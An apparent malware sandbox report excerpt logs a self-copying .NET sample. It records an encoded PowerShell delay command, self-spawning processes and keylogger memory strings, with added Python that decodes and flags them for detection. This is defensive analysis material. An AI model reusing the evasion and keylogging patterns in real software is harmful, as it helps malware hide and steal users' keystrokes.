                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess created: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
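The -ENC argument on the powershell.exe lines is base64 over UTF-16LE, which is why the report's decoding reads "start-sleep -seconds 20" and why a plain UTF-8 decode shows NUL-interleaved text instead. The Python below is an added example, not the report's own tooling: it decodes that flag from constructed process-creation records shaped like the "Process created" lines above, accepts -ec or any unambiguous prefix of -EncodedCommand the way powershell.exe does, and labels the two patterns seen here, a PowerShell child whose entire script is one Start-Sleep, and a child whose image is the parent's own image. The explorer.exe control record, the helper names and the verdict labels are constructed for the example.

```python
import base64
import re


def encode_ps(script):
    """Encode a script the way -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed (parent image, command line) records in the shape of the report's
# "Process created" lines. The first four carry the report's own values; the last is
# a constructed control with a different encoded command.
SAMPLE_EVENTS = [
    (r"C:\Users\user\Desktop\file.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC '
     "cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA=="),
    (r"C:\Users\user\Desktop\file.exe", r"C:\Users\user\Desktop\file.exe"),
    (r"C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC '
     "cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA=="),
    (r"C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe",
     r"C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"),
    (r"C:\Windows\explorer.exe", "powershell.exe -ec " + encode_ps("Get-Process | Out-Null")),
]

FLAG_RE = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/]+={0,2})", re.IGNORECASE)
SLEEP_ONLY_RE = re.compile(
    r"^\s*(?:start-sleep|sleep)\s+(?:-(?:s(?:econds)?|m(?:illiseconds)?)\s+)?\d+\s*;?\s*$",
    re.IGNORECASE,
)


def decode_encoded_command(cmdline):
    """Return the script carried by -EncodedCommand, or None when there is none.
    powershell.exe accepts -ec or any unambiguous prefix of -EncodedCommand (-e, -en,
    -enc, ...), so the flag is validated as a prefix instead of matched literally."""
    for flag, b64 in FLAG_RE.findall(cmdline):
        f = flag.lower()
        if f != "ec" and not "encodedcommand".startswith(f):
            continue          # -ep, -exec, -ea and friends are other switches
        try:
            return base64.b64decode(b64, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None       # malformed payload: worth a look, but not a script


def is_sleep_only(script):
    """True when the whole script is a single Start-Sleep: a child that exists only
    to burn clock time while the parent waits on it."""
    return SLEEP_ONLY_RE.match(script) is not None


def image_of(cmdline):
    """First token of a command line with surrounding quotes removed."""
    s = cmdline.strip()
    if s.startswith('"'):
        return s[1:].split('"', 1)[0]
    return s.split(None, 1)[0]


def triage(events):
    """Label each (parent, cmdline) record with the pattern it matches."""
    findings = []
    for parent, cmdline in events:
        script = decode_encoded_command(cmdline)
        if script is not None:
            verdict = "sleep-only-stager" if is_sleep_only(script) else "encoded-command"
            findings.append((parent, verdict, script))
        elif image_of(cmdline).lower() == parent.lower():
            # A process launching its own image is the usual first step before the
            # child's image at base 0x400000 is overwritten with a different PE
            # (the "value starts with: 4D5A" observations above).
            findings.append((parent, "self-spawn", cmdline))
    return findings


if __name__ == "__main__":
    for parent, verdict, detail in triage(SAMPLE_EVENTS):
        print(f"{verdict:18} {parent}  <-  {detail}")
```

Decoding the flag yourself matters because the same string is what a sandbox or EDR shows in a process tree; the verdict "sleep-only-stager" is the thing to alert on, since a legitimate automation job almost never spawns PowerShell to do nothing but sleep.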
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000004.00000002.618527573.0000000002D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>{Win}{Win}r{Win}
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>{Win}
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>{Win}{Win}
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>{Win}{Win}r{Win}r
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>{Win}{Win}r
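The memory strings above are successive snapshots of the sample's keystroke buffer growing as keys are typed: a bracketed header closed by "]</b>", a timestamp in parentheses, "<br>", then the keys, with special keys in braces ({Win}) and everything else literal. The Python below is an added example, not code from the report or from the malware, that parses the visible fragment and folds "{Win}" followed by "r" into Win+R so a responder reads the sequence as the Run dialog being opened twice. The leading "<b>[" that "]</b>" would close is not visible in the fragment and is assumed, as is the list of tokens treated as modifiers.

```python
import re
from datetime import datetime

# Constructed from the memory string shown above. Only this tail of the record is
# visible in the report; the opening "<b>[" that "]</b>" closes is assumed.
SAMPLE_FRAGMENT = (
    "Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>{Win}{Win}r{Win}r"
)

ENTRY_RE = re.compile(
    r"(?P<header>[^\]]*)\]</b>\s*\((?P<ts>[^)]*)\)<br>(?P<keys>.*)", re.DOTALL
)
# One token is either a braced special key such as {Win} or a single literal character.
TOKEN_RE = re.compile(r"\{[^}]+\}|.", re.DOTALL)
# Assumed set of tokens that combine with the key pressed after them.
MODIFIERS = {"win", "ctrl", "alt", "shift"}


def parse_entry(fragment):
    """Split one buffer entry into header, timestamp and key tokens; None if not one."""
    m = ENTRY_RE.search(fragment)
    if m is None:
        return None
    when = datetime.strptime(m["ts"].strip(), "%m/%d/%Y %I:%M:%S %p")
    return {
        "header": m["header"].strip(),
        "time": when,
        "tokens": TOKEN_RE.findall(m["keys"]),
    }


def chords(tokens):
    """Fold a modifier token and the literal key after it into one chord, so
    {Win} r reads as Win+R instead of two unrelated events; a modifier with no
    following literal (or followed by another special key) stands alone."""
    out, i = [], 0
    while i < len(tokens):
        tok = tokens[i]
        special = tok.startswith("{")
        name = tok[1:-1] if special else tok
        nxt = tokens[i + 1] if i + 1 < len(tokens) else None
        if special and name.lower() in MODIFIERS and nxt is not None and not nxt.startswith("{"):
            out.append(f"{name}+{nxt.upper()}")
            i += 2
        else:
            out.append(name)
            i += 1
    return out


if __name__ == "__main__":
    entry = parse_entry(SAMPLE_FRAGMENT)
    print(entry["time"].isoformat(), entry["header"])
    print(" ".join(chords(entry["tokens"])))
```

A literal "{" typed by the victim would be mistaken for the start of a special-key token by this tokenizer; the visible fragment gives no escaping rule for that case, so it is left as a known limit rather than guessed.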
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
